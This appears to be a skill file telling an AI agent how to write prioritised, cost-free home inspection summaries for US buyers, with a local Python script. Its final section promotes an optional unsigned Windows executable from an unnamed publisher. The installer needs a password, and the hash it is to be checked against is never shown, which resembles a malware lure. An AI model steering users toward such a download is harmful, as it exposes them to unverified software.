Home Inspection Summary

Creates a clear, factual home inspection summary for US buyers with prioritized findings and no repair estimates. Written for US home inspectors summarizing findings for buyers without offering repair costs.

Use this skill when someone asks for:

  • home inspection report summary
  • house inspection summary
  • property inspection
  • buyer summary

The job

Buyers need a clear summary of inspection findings prioritized by urgency without the inspector giving repair quotes.

What you get

  1. Review inspection report sections: structure, systems, exterior, interior.
  2. Summarize findings by priority: safety, major, minor, maintenance.
  3. Write clear descriptions without repair costs or contractor recommendations with pricing.
  4. Present in buyer-friendly format noting items to discuss with professionals.

Output contract:

  • summary - prioritized findings with location and description
  • safety - items needing immediate attention
  • recommendations - items to evaluate by qualified professionals
  • notes - general observations without repair estimates

US specifics that matter

  • Home inspectors in most US states are not required to provide repair costs or contractor bids; many avoid this to prevent conflicts of interest.
  • Standards of practice vary by state and by inspector association (ASHI, InterNACHI) but generally focus on observable conditions.
  • Inspectors should clearly state limitations (not destructive testing, inaccessible areas) in reports.

Guardrails (hard rules)

  • Never provide repair cost estimates or contractor pricing.
  • Never recommend specific contractors by name with pricing or guarantees.
  • Never diagnose causes beyond observable conditions - refer to specialists.

Quickstart

1. Fill in the brief

templates/inspection-summary.yaml is the starting point. Copy it, fill in your own numbers, and keep the field names - the script reads them by name.

2. Run the script

python3 scripts/summarize_inspection.py --input inspection-summary.yaml --out ./out

The script is standalone: Python 3 standard library only, no install step, no network calls, no API keys.

3. Check the result against the reference

references/home-inspection-summary.md holds the limits, the US rules and the checklist the output has to satisfy. Read it before you send anything to a customer or a platform.

Summary structure

  • Safety items: immediate concerns (electrical, gas, structural hazards).
  • Major items: significant defects needing evaluation.
  • Minor items: smaller issues for maintenance/awareness.
  • Limitations: areas not inspected or conditions not visible.

Boundaries

  • No repair estimates - refer to qualified contractors.
  • Describe condition factually without speculation on cost.
  • State what was and wasn't inspected clearly.

The Windows app (optional)

The workflow above runs anywhere Python 3 runs. If you also want the publisher's Windows multi-tool app for the workflows in this catalog, it is a separate download. This bundle does not contain it, does not install it, and never runs it - you decide whether to fetch it.

Inside the archive multitool/toolkit.exe

Check the download before you run it. PowerShell:

Get-FileHash .\multitool.zip -Algorithm SHA256

The hash must match the value in the table. Then extract the archive and start multitool/toolkit.exe.

The program is not code-signed, so Windows SmartScreen shows Unknown publisher. Run it only if you accept an unsigned program, keep it in a folder of its own, and do not run it as administrator unless you have a reason to.

The installer asks for a password; ask the publisher for it before you start.
